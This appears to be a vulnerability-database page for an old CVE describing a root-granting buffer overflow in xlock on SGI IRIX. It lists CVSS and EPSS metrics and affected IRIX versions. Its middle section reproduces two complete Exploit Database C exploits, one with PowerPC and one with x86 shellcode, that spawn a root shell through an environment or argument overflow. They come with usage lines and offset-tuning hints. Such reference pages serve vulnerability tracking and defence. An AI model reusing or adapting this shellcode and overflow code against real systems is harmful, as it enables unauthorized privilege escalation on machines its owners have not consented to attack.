Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
root privileges via buffer overflow in xlock command on SGI IRIX systems.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 7.2 | AV:L/AC:L/Au:N/C:C/I:C/A:C | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 19173
Publication date : 1997-04-25 22h00 +00:00
Author : BeastMaster
EDB Verified : Yes
/*
source: https://www.securityfocus.com/bid/224/info
The xlock program is used to lock the local X display until the user supplies the correct password. A buffer overflow condition has been discovered in xlock that may allow an unauthorized user to gain root access.
*/
/*
*
* /usr/bin/X11/xlock exploit (kinda' coded) by BeastMaster V
*
* CREDITS: this code is simply a modified version of an exploit
* posted by Georgi Guninski ([email protected])
*
* USAGE:
* $ cc -o foo -g aix_xlock.c
* $ ./foo 3200
* #
*
* HINT: Try giving ranges from 3100 through 3400
* (If these ranges don't work, then run the brute
* korn shell script provided after the exploit)
*
* DISCLAIMER: use this program in a responsible manner.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
extern int execv();
#define MAXBUF 600
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
putenv(c);
return c;
}
main(int argc,char **argv,char **env)
{
unsigned int buf[MAXBUF],frame[MAXBUF],i,nop,toc,eco,*pt;
int min=200, max=300;
unsigned int return_address;
char *newenv[8];
char *args[4];
int offset=3200;
if (argc==2) offset = atoi(argv[1]);
pt=(unsigned *) &execv; toc=*(pt+1); eco=*pt;
*((unsigned short *)code+9)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code+7)=(unsigned short) ((toc >> 16) & 0x0000ffff);
*((unsigned short *)code+15)=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code+13)=(unsigned short) ((eco >> 16) & 0x0000ffff);
return_address=(unsigned)&buf[0]+offset;
for(nop=0;nop<min;nop++) buf[nop]=0x4ffffb82;
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;
for(i=0;i<max-1;i++) frame[i]=return_address;
frame[i]=0;
newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=createvar("HOME",(char*)&frame[0]);
args[0]="xlock";
execve("/usr/bin/X11/xlock",args,newenv);
perror("Error executing execve \n");
}
Exploit Database EDB-ID : 19172
Publication date : 1997-04-25 22h00 +00:00
Author : cesaro
EDB Verified : Yes
/*
source: https://www.securityfocus.com/bid/224/info
The xlock program is used to lock the local X display until the user supplies the correct password. A buffer overflow condition has been discovered in xlock that may allow an unauthorized user to gain root access.
*/
/* x86 XLOCK overflow exploit
by [email protected] 4/17/97
Original exploit framework - lpr exploit
Usage: make xlock-exploit
xlock-exploit <optional_offset>
Assumptions: xlock is suid root, and installed in /usr/X11/bin
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define DEFAULT_OFFSET 50
#define BUFFER_SIZE 996
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
int main(int argc, char *argv[])
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int dfltOFFSET = DEFAULT_OFFSET;
u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
"\xd7\xff\xff\xff/bin/sh";
int i;
if (argc > 1)
dfltOFFSET = atoi(argv[1]);
else printf("You can specify another offset as a parameter if you
need...\n");
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i<2;i++)
*(addr_ptr++) = get_esp() + dfltOFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/X11/bin/xlock", "xlock", "-nolock", "-name", buff, NULL);
}
Products Mentioned
Configuraton 0
Sgi>>Irix >> Version *
- Sgi>>Irix >> Version - (Open CPE detail)
- Sgi>>Irix >> Version 4.0.1 (Open CPE detail)
- Sgi>>Irix >> Version 4.0.1t (Open CPE detail)
- Sgi>>Irix >> Version 4.0.2 (Open CPE detail)
- Sgi>>Irix >> Version 4.0.3 (Open CPE detail)
- Sgi>>Irix >> Version 4.0.4 (Open CPE detail)
- Sgi>>Irix >> Version 4.0.4b (Open CPE detail)
- Sgi>>Irix >> Version 4.0.4t (Open CPE detail)
- Sgi>>Irix >> Version 4.0.5 (Open CPE detail)
- Sgi>>Irix >> Version 4.0.5_iop (Open CPE detail)
- Sgi>>Irix >> Version 4.0.5a (Open CPE detail)
- Sgi>>Irix >> Version 4.0.5b (Open CPE detail)
- Sgi>>Irix >> Version 4.0.5d (Open CPE detail)
- Sgi>>Irix >> Version 4.0.5e (Open CPE detail)
- Sgi>>Irix >> Version 4.0.5f (Open CPE detail)
- Sgi>>Irix >> Version 4.0.5g (Open CPE detail)
- Sgi>>Irix >> Version 4.0.5h (Open CPE detail)
- Sgi>>Irix >> Version 5.0.1 (Open CPE detail)
- Sgi>>Irix >> Version 5.1 (Open CPE detail)
- Sgi>>Irix >> Version 5.1.1 (Open CPE detail)
- Sgi>>Irix >> Version 5.2 (Open CPE detail)
- Sgi>>Irix >> Version 5.3 (Open CPE detail)
- Sgi>>Irix >> Version 5.3 (Open CPE detail)
- Sgi>>Irix >> Version 6.0 (Open CPE detail)
- Sgi>>Irix >> Version 6.0.1 (Open CPE detail)
- Sgi>>Irix >> Version 6.0.1 (Open CPE detail)
- Sgi>>Irix >> Version 6.1 (Open CPE detail)
- Sgi>>Irix >> Version 6.2 (Open CPE detail)
- Sgi>>Irix >> Version 6.3 (Open CPE detail)
- Sgi>>Irix >> Version 6.4 (Open CPE detail)
- Sgi>>Irix >> Version 6.5 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.1 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.2 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.2f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.2m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.3 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.3f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.3m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.4 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.4f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.4m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.5 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.5f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.5m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.6 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.6f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.6m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.7 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.7f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.7m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.8 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.8f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.8m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.9 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.9f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.9m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.10 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.10f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.10m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.11 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.11f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.11m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.12 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.12f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.12m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.13 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.13f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.13m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.14 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.14f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.14m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.15 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.15f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.15m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.16 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.16f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.16m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.17 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.17f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.17m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.18 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.18f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.18m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.19 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.19f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.19m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.20 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.20f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.20m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.21 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.21f (Open CPE detail)
- Sgi>>Irix >> Version 6.5.21m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.22 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.22m (Open CPE detail)
- Sgi>>Irix >> Version 6.5.23 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.24 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.25 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.26 (Open CPE detail)
- Sgi>>Irix >> Version 6.5.27 (Open CPE detail)
References
2025©
tesweb SA
